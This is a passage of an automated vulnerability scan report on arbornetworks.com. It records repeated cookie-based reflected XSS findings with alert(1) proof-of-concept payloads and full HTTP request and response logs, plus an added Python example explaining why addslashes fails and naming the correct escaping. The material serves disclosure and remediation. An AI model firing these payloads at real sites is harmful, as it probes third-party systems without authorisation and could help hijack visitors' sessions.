Cookie: mbfcookie[lang]=enbd6b5"><script>alert(1)</script>22edd466f97; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:02:41 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=545e64e48d805f5d6be6e0e99fa8ebd9; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:02:42 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:02:42 GMT; path=/
Set-Cookie: mbfcookie[lang]=it; expires=Fri, 04-Feb-2011 00:02:43 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 00:02:43 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...
<meta lang="enbd6b5\"><script>alert(1)</script>22edd466f97">
...[SNIP]...

3.165. http://www.arbornetworks.com/it/infrastructure-security-report.html [mbfcookie[lang] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /it/infrastructure-security-report.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b884f"><script>alert(1)</script>27d3dcaf1dc was submitted in the mbfcookie[lang] cookie. This input was echoed as b884f\"><script>alert(1)</script>27d3dcaf1dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /it/infrastructure-security-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=enb884f"><script>alert(1)</script>27d3dcaf1dc; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:05:37 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=a508c52cccdb7282c97e2f4a70359724; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:05:37 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:05:37 GMT; path=/
Set-Cookie: mbfcookie[lang]=it; expires=Fri, 04-Feb-2011 00:05:38 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Thu, 03 Feb 2011 00:05:43 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<meta lang="enb884f\"><script>alert(1)</script>27d3dcaf1dc">
...[SNIP]...

3.166. http://www.arbornetworks.com/jp/2.html [mbfcookie[lang] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /jp/2.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8184b"><script>alert(1)</script>1699682b65d was submitted in the mbfcookie[lang] cookie. This input was echoed as 8184b\"><script>alert(1)</script>1699682b65d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /jp/2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en8184b"><script>alert(1)</script>1699682b65d; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:58:35 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=9ca9b70e153f8141430a46d74e981ee8; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:58:36 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:58:36 GMT; path=/
Set-Cookie: mbfcookie[lang]=jp; expires=Thu, 03-Feb-2011 23:58:37 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:58:37 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...
<meta lang="en8184b\"><script>alert(1)</script>1699682b65d">
...[SNIP]...

3.167. http://www.arbornetworks.com/jp/infrastructure-security-report.html [mbfcookie[lang] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /jp/infrastructure-security-report.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4a5f"><script>alert(1)</script>be89fa02b90 was submitted in the mbfcookie[lang] cookie. This input was echoed as e4a5f\"><script>alert(1)</script>be89fa02b90 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /jp/infrastructure-security-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=ene4a5f"><script>alert(1)</script>be89fa02b90; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:05:14 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=f2a9fb3cbd3eca6e85ad4f71016475b1; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:05:14 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:05:14 GMT; path=/
Set-Cookie: mbfcookie[lang]=jp; expires=Fri, 04-Feb-2011 00:05:15 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Thu, 03 Feb 2011 00:05:18 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<meta lang="ene4a5f\"><script>alert(1)</script>be89fa02b90">
...[SNIP]...

3.168. http://www.arbornetworks.com/kr/2.html [mbfcookie[lang] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /kr/2.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad6f9"><script>alert(1)</script>0bc779789b was submitted in the mbfcookie[lang] cookie. This input was echoed as ad6f9\"><script>alert(1)</script>0bc779789b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /kr/2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=enad6f9"><script>alert(1)</script>0bc779789b; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:01:53 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=0a6b97f628d39a90dee2831d97a64c92; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:01:55 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:01:55 GMT; path=/
Set-Cookie: mbfcookie[lang]=kr; expires=Fri, 04-Feb-2011 00:01:56 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 00:01:58 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...
<meta lang="enad6f9\"><script>alert(1)</script>0bc779789b">
...[SNIP]...

3.169. http://www.arbornetworks.com/kr/network-infrastructure-security-report.html [mbfcookie[lang] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /kr/network-infrastructure-security-report.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e2d6"><script>alert(1)</script>e91882c8043 was submitted in the mbfcookie[lang] cookie. This input was echoed as 4e2d6\"><script>alert(1)</script>e91882c8043 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability: in practice a cookie-setting bug on any host under the same registrable domain (a subdomain can set cookies for its parent domain), an HTTP header injection issue, or a network position that allows injecting Set-Cookie into a plain-HTTP response. This limitation considerably mitigates the impact of the vulnerability but does not remove it.

Request

GET /kr/network-infrastructure-security-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en4e2d6"><script>alert(1)</script>e91882c8043; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:05:42 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=fe71f0ac4b9241c4bc66dbfa4b51bc91; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:05:42 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:05:42 GMT; path=/
Set-Cookie: mbfcookie[lang]=kr; expires=Fri, 04-Feb-2011 00:05:43 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Thu, 03 Feb 2011 00:05:46 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<meta lang="en4e2d6\"><script>alert(1)</script>e91882c8043">
...[SNIP]...
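Why the backslash in the echoed value does not help. The following is an added example, not part of the scanner output or the site's own code: it renders the cookie value into the same <meta lang="..."> template the responses show, once through an emulation of PHP's addslashes() (the escaping that evidently produced the \" above) and once through html.escape(), then feeds both through Python's standard-library HTML tokenizer to see which tags a parser actually creates. The cookie value is the one recorded for this finding; the template and the addslashes emulation are assumptions.

```python
import html
from html.parser import HTMLParser

# Constructed sample: the cookie value recorded for this finding, the legitimate
# "en" prefix followed by the scanner's probe.
COOKIE_VALUE = 'en4e2d6"><script>alert(1)</script>e91882c8043'


def addslashes(value: str) -> str:
    """Emulates PHP addslashes()/magic_quotes: a backslash before ' " \\ and NUL.
    This is the escaping that produced the \\" seen in the response. It is an
    SQL-style escape; an HTML tokenizer gives the backslash no meaning at all."""
    return (value.replace("\\", "\\\\").replace("'", "\\'")
                 .replace('"', '\\"').replace("\x00", "\\0"))


def html_attr(value: str) -> str:
    """Context-correct encoding for a double-quoted HTML attribute value."""
    return html.escape(value, quote=True)


def render_meta(value: str, encoder) -> str:
    """The template the responses show (assumed): the cookie value inside a quoted attribute."""
    return '<meta lang="%s">' % encoder(value)


class _Tokens(HTMLParser):
    """Collects the start tags the stdlib tokenizer emits, plus the meta lang value it assigns."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.lang = None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "meta":
            self.lang = dict(attrs).get("lang")


def parse(markup: str) -> _Tokens:
    p = _Tokens()
    p.feed(markup)
    p.close()
    return p


def start_tags(markup: str) -> list:
    """Element names a parser would create from this markup, in order."""
    return parse(markup).tags


def lang_attribute(markup: str) -> str:
    """The lang value the parser actually assigns to the meta element."""
    return parse(markup).lang


if __name__ == "__main__":
    for name, enc in (("addslashes", addslashes), ("html.escape", html_attr)):
        markup = render_meta(COOKIE_VALUE, enc)
        print("%-11s tags=%s lang=%r" % (name, start_tags(markup), lang_attribute(markup)))
```

With addslashes the tokenizer reports ['meta', 'script'] and a lang attribute truncated to en4e2d6\ ; with html.escape it reports only ['meta'] and hands the complete cookie value back as the attribute. The fix is attribute encoding at the output point (html.escape here, htmlspecialchars(..., ENT_QUOTES) in PHP), not addslashes or magic_quotes on input.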

3.170. http://www.arbornetworks.com/privacy_policy.php [mbfcookie[lang] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /privacy_policy.php

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac374"><script>alert(1)</script>5a50e0c21ab was submitted in the mbfcookie[lang] cookie. This input was echoed as ac374\"><script>alert(1)</script>5a50e0c21ab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /privacy_policy.php HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=enac374"><script>alert(1)</script>5a50e0c21ab; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:56:42 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=cc0c770c26d7972f4e5fa31c38568bac; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:56:43 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:56:43 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:56:44 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:56:44 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<meta lang="enac374\"><script>alert(1)</script>5a50e0c21ab">
...[SNIP]...

3.171. https://www.arbornetworks.com/ [mbfcookie[lang] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.arbornetworks.com
Path:   /

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9071"><script>alert(1)</script>e4e30e085f was submitted in the mbfcookie[lang] cookie. This input was echoed as a9071\"><script>alert(1)</script>e4e30e085f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=ena9071"><script>alert(1)</script>e4e30e085f; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:04:19 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e585cbcac8f7bba066a55f149566ddd5=e76d99c551293ab7d0c23ee0ecdb6485; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:04:18 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:04:18 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Fri, 04-Feb-2011 00:04:19 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 00:04:20 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...
<meta lang="ena9071\"><script>alert(1)</script>e4e30e085f">
...[SNIP]...

3.172. https://www.arbornetworks.com/en/lost-password-3.html [mbfcookie[lang] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.arbornetworks.com
Path:   /en/lost-password-3.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54038"><script>alert(1)</script>1e95dab8e0e was submitted in the mbfcookie[lang] cookie. This input was echoed as 54038\"><script>alert(1)</script>1e95dab8e0e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/lost-password-3.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en54038"><script>alert(1)</script>1e95dab8e0e; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:04:40 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e585cbcac8f7bba066a55f149566ddd5=9eea038b074e30087eeedae6e935ba9a; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:04:40 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:04:40 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Fri, 04-Feb-2011 00:04:41 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 00:04:41 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<meta lang="en54038\"><script>alert(1)</script>1e95dab8e0e">
...[SNIP]...

3.173. https://www.arbornetworks.com/en/partner-portal-home.html [mbfcookie[lang] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.arbornetworks.com
Path:   /en/partner-portal-home.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload deb1d"><script>alert(1)</script>cfcda14f30a was submitted in the mbfcookie[lang] cookie. This input was echoed as deb1d\"><script>alert(1)</script>cfcda14f30a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/partner-portal-home.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=endeb1d"><script>alert(1)</script>cfcda14f30a; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response (redirected)

HTTP/1.0 404 NOT FOUND
Date: Thu, 03 Feb 2011 00:04:54 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e585cbcac8f7bba066a55f149566ddd5=f1fe583671ff7bddd5f555081913ea24; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:04:54 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:04:54 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Fri, 04-Feb-2011 00:04:55 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 00:04:56 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<meta lang="endeb1d\"><script>alert(1)</script>cfcda14f30a">
...[SNIP]...

3.174. https://www.arbornetworks.com/index.php [mbfcookie[lang] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.arbornetworks.com
Path:   /index.php

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8239"><script>alert(1)</script>31f3540dcc0 was submitted in the mbfcookie[lang] cookie. This input was echoed as d8239\"><script>alert(1)</script>31f3540dcc0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

